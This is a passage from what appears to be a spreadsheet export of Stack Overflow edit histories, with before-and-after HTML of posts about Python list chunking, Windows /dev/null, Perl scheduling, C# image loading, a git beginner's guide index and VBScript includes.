 &lt;p&gt; I have a list of arbitrary length, and I need to split it up into equal size chunks and operate on it. There are some obvious ways to do this, like keeping a counter and two lists, and when the second list fills up, add it to the first list and empty the second list for the next round of data, but this is potentially extremely expensive.&lt;/p&gt; _x000D_
 &lt;p&gt; I was wondering if anyone had a good solution to this for lists of any length, e.g. using generators.&lt;/p&gt; _x000D_
 &lt;p&gt; I was looking for something useful in &lt;code&gt;itertools&lt;/code&gt; but I couldn't find anything obviously useful. Might've missed it, though.&lt;/p&gt; _x000D_
 &lt;p&gt; Related question: &lt;a href="http://stackoverflow.com/questions/434287/what-is-the-most-pythonic-way-to-iterate-over-a-list-in-chunks"&gt;What is the most â€œpythonicâ€? way to iterate over a list in chunks?&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the &lt;span class="diff-delete"&gt;equvivalent&lt;/span&gt; to /dev/null in Windows?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What is the &lt;span class="diff-add"&gt;equivalent&lt;/span&gt; to /dev/null in Windows?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am mulling over a web-app in &lt;span class="diff-delete"&gt;perl&lt;/span&gt; that will allow users to create bug monitors. So essentially each "bug watch" will be a bug ID that will be passed to a sub routine along with the "sleep" time, and once the the &lt;span class="diff-delete"&gt;"sleeptime"&lt;/span&gt; is over it must recur without blocking the parent process or the peer processes&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; 1: I tried Schedule::Cron It supports cron like format but here the arguments to the subs must be simple scalars hence I ruled it out&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; 2: POE/Coro seem to be another options but I don't have much idea about it/ :(&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Any insights ? TIA&lt;/p&gt; _x000D_
 &lt;p&gt;-Matt.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am mulling over a web-app in &lt;span class="diff-add"&gt;Perl&lt;/span&gt; that will allow users to create bug monitors. So essentially each "bug watch" will be a bug ID that will be passed to a sub routine along with the "sleep" time, and once the the &lt;span class="diff-add"&gt;"sleep time"&lt;/span&gt; is over it must recur without blocking the parent process or the peer processes.&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;span class="diff-add"&gt; I tried &lt;/span&gt;&lt;a href="http://search.cpan.org/dist/Schedule-Cron" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;Schedule::Cron&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-add"&gt; It supports cron like format but here the arguments to the subs must be simple scalars hence I ruled it out.&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;span class="diff-add"&gt; POE/Coro seem to be another options but I don't have much idea about it/ :(&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Any insights ? TIA&lt;/p&gt; _x000D_
 &lt;p&gt;-Matt.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>brian d foy</t>
  </si>
  <si>
    <t>matt</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;How could you&lt;/span&gt; load&lt;span class="diff-delete"&gt; images--say&lt;/span&gt; 52 images &lt;span class="diff-delete"&gt;of a deck&lt;/span&gt; of cards&lt;span class="diff-delete"&gt;--in&lt;/span&gt; gif format from &lt;span class="diff-delete"&gt;an application's resource&lt;/span&gt; folder into an &lt;span class="diff-delete"&gt;array of &lt;/span&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/system.drawing.image(VS.80).aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;Image&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt; objects&lt;/span&gt; in &lt;span class="diff-delete"&gt;C#&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;I want to&lt;/span&gt; load 52 images &lt;span class="diff-add"&gt;(deck&lt;/span&gt; of cards&lt;span class="diff-add"&gt;) in&lt;/span&gt; gif format from &lt;span class="diff-add"&gt;my recourse&lt;/span&gt; folder into an &lt;span class="diff-add"&gt;Image[]&lt;/span&gt; in &lt;span class="diff-add"&gt;c#. Any ideas&lt;/span&gt;?&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Thanks, Jon&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jon</t>
  </si>
  <si>
    <t>user7116</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; try:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;",".join( map(str, record_ids) )_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;",".join( list\_of\_Strings )&lt;/span&gt;&lt;/code&gt; joins a list of string by separating them with commas&lt;/p&gt; _x000D_
 &lt;p&gt; if you have a list of numbers, &lt;code&gt;&lt;span class="diff-delete"&gt;map( str, list )&lt;/span&gt;&lt;/code&gt; will convert it to a list of strings&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; try:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;",".join( map(str, record_ids) )_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; ",".join( list_of_Strings )&lt;/span&gt; joins a list of string by separating them with commas&lt;/p&gt; _x000D_
 &lt;p&gt; if you have a list of numbers&lt;span class="diff-add"&gt;, map( str&lt;/span&gt;,&lt;span class="diff-add"&gt; list&lt;/span&gt; &lt;span class="diff-add"&gt;)&lt;/span&gt; will convert it to a list of strings&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Patrick McElhaney</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Ok, after seeing &lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/2678236#2678236"&gt;this post by PJ Hyett&lt;/a&gt;, I have decided to skip to the end and go with git.&lt;/p&gt; _x000D_
 &lt;p&gt; So what I need is a beginners &lt;strong&gt;practical&lt;/strong&gt; guide to git. "Beginner" being defined as someone who knows how to handle their compiler, understands to some level what a makefile is, and has touched source control without understanding it very well.&lt;/p&gt; _x000D_
 &lt;p&gt; "Practical" being defined as this person doesn't want to get into great detail regarding what git is doing in the background, and doesn't even care (or know) that it's distributed. Your answers might hint at the possibilities, but try to aim for the beginner that wants to keep a 'main' repository on a 'server' which is backed up and secure, and treat their local repository as merely a 'client' resource.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Procedural note:&lt;/strong&gt; &lt;em&gt;PLEASE pick one and only one of the below topics and answer it clearly and concisely in any given answer. Don't try to jam a bunch of information into one answer. Don't just link to other resources - cut and paste with attribution if copyright allows, otherwise learn it and explain it in your own words (ie, don't make people leave this page to learn a task). Please comment on, or edit, an already existing answer unless your explanation is&lt;/em&gt; very &lt;em&gt;different and you think the community is better served with a different explanation rather than altering the existing explanation.&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; So:&lt;/p&gt; _x000D_
 &lt;h2&gt;Installation/Setup&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323764"&gt;How to install git&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; How do you set up git? Try to cover linux, windows, mac, think 'client/server' mindset. _x000D_
   &lt;ul&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/1482824/setup-git-server-with-msysgit-on-windows"&gt;Setup GIT Server with Msysgit on Windows&lt;/a&gt;&lt;/li&gt; _x000D_
   &lt;/ul&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#320140"&gt;How do you create a new project/repository?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#316062"&gt;How do you configure it to ignore files (.obj, .user, etc) that are not really part of the codebase?&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Working with the code&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/1350157#1350157"&gt;How do you get the latest code?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323906"&gt;How do you check out code?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#316055"&gt;How do you commit changes?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#319465"&gt;How do you see what's uncommitted, or the status of your current codebase?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323898"&gt;How do you destroy unwanted commits?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/1762631#1762631"&gt;How do you compare two revisions of a file, or your current file and a previous revision?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/2114836#2114836"&gt;How do you see the history of revisions to a file?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; How do you handle binary files (visio docs, for instance, or compiler environments)?&lt;/li&gt; _x000D_
  &lt;li&gt; How do you merge files changed at the "same time"?&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/323898#323898"&gt;How do you undo (revert or reset) a commit?&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Tagging, branching, releases, baselines&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#322967"&gt;How do you 'mark' 'tag' or 'release' a particular set of revisions for a particular set of files so you can always pull that one later?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; How do you pull a particular 'release'?&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/816614#816614"&gt;How do you branch?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/816636#816636"&gt;How do you merge branches?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; How do you resolve conflicts and complete the merge?&lt;/li&gt; _x000D_
  &lt;li&gt; How do you merge parts of one branch into another branch?&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://gitready.com/intermediate/2009/01/31/intro-to-rebase.html" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;What is rebasing?&lt;/span&gt;&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/1590791#1590791"&gt;How do I track remote branches?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/1590803#1590803"&gt;How can I create a branch on a remote repository?&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Other&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Describe and link to a good gui, IDE plugin, etc that makes git a non-command line resource, but please list its limitations as well as its good. _x000D_
   &lt;ul&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323559"&gt;msysgit&lt;/a&gt; - Cross platform, included with git&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323559"&gt;gitk&lt;/a&gt; - Cross platform history viewer, included with git&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323559"&gt;gitnub&lt;/a&gt; - OS X&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323559"&gt;gitx&lt;/a&gt; - OS X history viewer&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323559"&gt;smartgit&lt;/a&gt; - Cross platform, commercial, beta&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/322989#322989"&gt;tig&lt;/a&gt; - console GUI for Linux&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/644129#644129"&gt;qgit&lt;/a&gt; - GUI for Windows, Linux&lt;/li&gt; _x000D_
   &lt;/ul&gt; &lt;/li&gt; _x000D_
  &lt;li&gt; Any other common tasks a beginner should know? _x000D_
   &lt;ul&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/319465#319465"&gt;Git Status tells you what you just did, what branch you have, and other useful information&lt;/a&gt;&lt;/li&gt; _x000D_
   &lt;/ul&gt; &lt;/li&gt; _x000D_
  &lt;li&gt; How do I work effectively with a subversion repository set as my source control source?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Other git beginner's references&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.sourcemage.org/Git_Guide" rel="nofollow noreferrer"&gt;git guide&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://book.git-scm.com/" rel="nofollow noreferrer"&gt;git book&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www-cs-students.stanford.edu/%7Eblynn/gitmagic/" rel="nofollow noreferrer"&gt;git magic&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.gitcasts.com/" rel="nofollow noreferrer"&gt;gitcasts&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://github.com/guides/home" rel="nofollow noreferrer"&gt;github guides&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.kernel.org/pub/software/scm/git/docs/gittutorial.html" rel="nofollow noreferrer"&gt;git tutorial&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://progit.org/book" rel="nofollow noreferrer"&gt;Progit - book by Scott Chacon&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://git.or.cz/course/svn.html" rel="nofollow noreferrer" title="Git - SVN Crash Course"&gt;Git - SVN Crash Course&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.newartisans.com/2008/04/git-from-the-bottom-up.html" rel="nofollow noreferrer"&gt;Git from the bottom up&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Delving into git&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.eecs.harvard.edu/%7Ecduan/technical/git/" rel="nofollow noreferrer"&gt;Understanding git conceptually&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I will go through the entries from time to time and 'tidy' them up so they have a consistent look/feel and it's easy to scan the list - feel free to follow a simple "header - brief explanation - list of instructions - gotchas and extra info" template. I'll also link to the entries from the bullet list above so it's easy to find them later.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Ok, after seeing &lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/2678236#2678236"&gt;this post by PJ Hyett&lt;/a&gt;, I have decided to skip to the end and go with git.&lt;/p&gt; _x000D_
 &lt;p&gt; So what I need is a beginners &lt;strong&gt;practical&lt;/strong&gt; guide to git. "Beginner" being defined as someone who knows how to handle their compiler, understands to some level what a makefile is, and has touched source control without understanding it very well.&lt;/p&gt; _x000D_
 &lt;p&gt; "Practical" being defined as this person doesn't want to get into great detail regarding what git is doing in the background, and doesn't even care (or know) that it's distributed. Your answers might hint at the possibilities, but try to aim for the beginner that wants to keep a 'main' repository on a 'server' which is backed up and secure, and treat their local repository as merely a 'client' resource.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Procedural note:&lt;/strong&gt; &lt;em&gt;PLEASE pick one and only one of the below topics and answer it clearly and concisely in any given answer. Don't try to jam a bunch of information into one answer. Don't just link to other resources - cut and paste with attribution if copyright allows, otherwise learn it and explain it in your own words (ie, don't make people leave this page to learn a task). Please comment on, or edit, an already existing answer unless your explanation is&lt;/em&gt; very &lt;em&gt;different and you think the community is better served with a different explanation rather than altering the existing explanation.&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; So:&lt;/p&gt; _x000D_
 &lt;h2&gt;Installation/Setup&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323764"&gt;How to install git&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; How do you set up git? Try to cover linux, windows, mac, think 'client/server' mindset. _x000D_
   &lt;ul&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/1482824/setup-git-server-with-msysgit-on-windows"&gt;Setup GIT Server with Msysgit on Windows&lt;/a&gt;&lt;/li&gt; _x000D_
   &lt;/ul&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#320140"&gt;How do you create a new project/repository?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#316062"&gt;How do you configure it to ignore files (.obj, .user, etc) that are not really part of the codebase?&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Working with the code&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/1350157#1350157"&gt;How do you get the latest code?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323906"&gt;How do you check out code?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#316055"&gt;How do you commit changes?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#319465"&gt;How do you see what's uncommitted, or the status of your current codebase?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323898"&gt;How do you destroy unwanted commits?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/1762631#1762631"&gt;How do you compare two revisions of a file, or your current file and a previous revision?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/2114836#2114836"&gt;How do you see the history of revisions to a file?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; How do you handle binary files (visio docs, for instance, or compiler environments)?&lt;/li&gt; _x000D_
  &lt;li&gt; How do you merge files changed at the "same time"?&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/323898#323898"&gt;How do you undo (revert or reset) a commit?&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Tagging, branching, releases, baselines&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#322967"&gt;How do you 'mark' 'tag' or 'release' a particular set of revisions for a particular set of files so you can always pull that one later?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; How do you pull a particular 'release'?&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/816614#816614"&gt;How do you branch?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/816636#816636"&gt;How do you merge branches?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; How do you resolve conflicts and complete the merge?&lt;/li&gt; _x000D_
  &lt;li&gt; How do you merge parts of one branch into another branch?&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;span class="diff-add"&gt; What is rebasing?&lt;/span&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/1590791#1590791"&gt;How do I track remote branches?&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/1590803#1590803"&gt;How can I create a branch on a remote repository?&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Other&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Describe and link to a good gui, IDE plugin, etc that makes git a non-command line resource, but please list its limitations as well as its good. _x000D_
   &lt;ul&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323559"&gt;msysgit&lt;/a&gt; - Cross platform, included with git&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323559"&gt;gitk&lt;/a&gt; - Cross platform history viewer, included with git&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323559"&gt;gitnub&lt;/a&gt; - OS X&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323559"&gt;gitx&lt;/a&gt; - OS X history viewer&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide#323559"&gt;smartgit&lt;/a&gt; - Cross platform, commercial, beta&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/322989#322989"&gt;tig&lt;/a&gt; - console GUI for Linux&lt;/li&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/644129#644129"&gt;qgit&lt;/a&gt; - GUI for Windows, Linux&lt;/li&gt; _x000D_
   &lt;/ul&gt; &lt;/li&gt; _x000D_
  &lt;li&gt; Any other common tasks a beginner should know? _x000D_
   &lt;ul&gt; _x000D_
    &lt;li&gt;&lt;a href="http://stackoverflow.com/questions/315911/git-for-beginners-the-definitive-practical-guide/319465#319465"&gt;Git Status tells you what you just did, what branch you have, and other useful information&lt;/a&gt;&lt;/li&gt; _x000D_
   &lt;/ul&gt; &lt;/li&gt; _x000D_
  &lt;li&gt; How do I work effectively with a subversion repository set as my source control source?&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Other git beginner's references&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.sourcemage.org/Git_Guide" rel="nofollow noreferrer"&gt;git guide&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://book.git-scm.com/" rel="nofollow noreferrer"&gt;git book&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www-cs-students.stanford.edu/%7Eblynn/gitmagic/" rel="nofollow noreferrer"&gt;git magic&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.gitcasts.com/" rel="nofollow noreferrer"&gt;gitcasts&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://github.com/guides/home" rel="nofollow noreferrer"&gt;github guides&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.kernel.org/pub/software/scm/git/docs/gittutorial.html" rel="nofollow noreferrer"&gt;git tutorial&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://progit.org/book" rel="nofollow noreferrer"&gt;Progit - book by Scott Chacon&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://git.or.cz/course/svn.html" rel="nofollow noreferrer" title="Git - SVN Crash Course"&gt;Git - SVN Crash Course&lt;/a&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.newartisans.com/2008/04/git-from-the-bottom-up.html" rel="nofollow noreferrer"&gt;Git from the bottom up&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;h2&gt;Delving into git&lt;/h2&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;a href="http://www.eecs.harvard.edu/%7Ecduan/technical/git/" rel="nofollow noreferrer"&gt;Understanding git conceptually&lt;/a&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I will go through the entries from time to time and 'tidy' them up so they have a consistent look/feel and it's easy to scan the list - feel free to follow a simple "header - brief explanation - list of instructions - gotchas and extra info" template. I'll also link to the entries from the bullet list above so it's easy to find them later.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Koobz</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; VBScript doesn't appear to have a way to include a common file of functions.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there a way to achieve this?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Posted for information since I have an answer, but I'd like to know if there's better ones - I'll accept the highest-voted answer (or second-highest in the unlikely event I'm the highest) sometime tomorrow.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; VBScript doesn't appear to have a way to include a common file of functions.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there a way to achieve this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Um, what are you trying to do? Why are you using parameters? Why not just execute SQL in code, like this:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Public Sub TestMemoField_x000D_
  Dim strSQL As String_x000D_
_x000D_
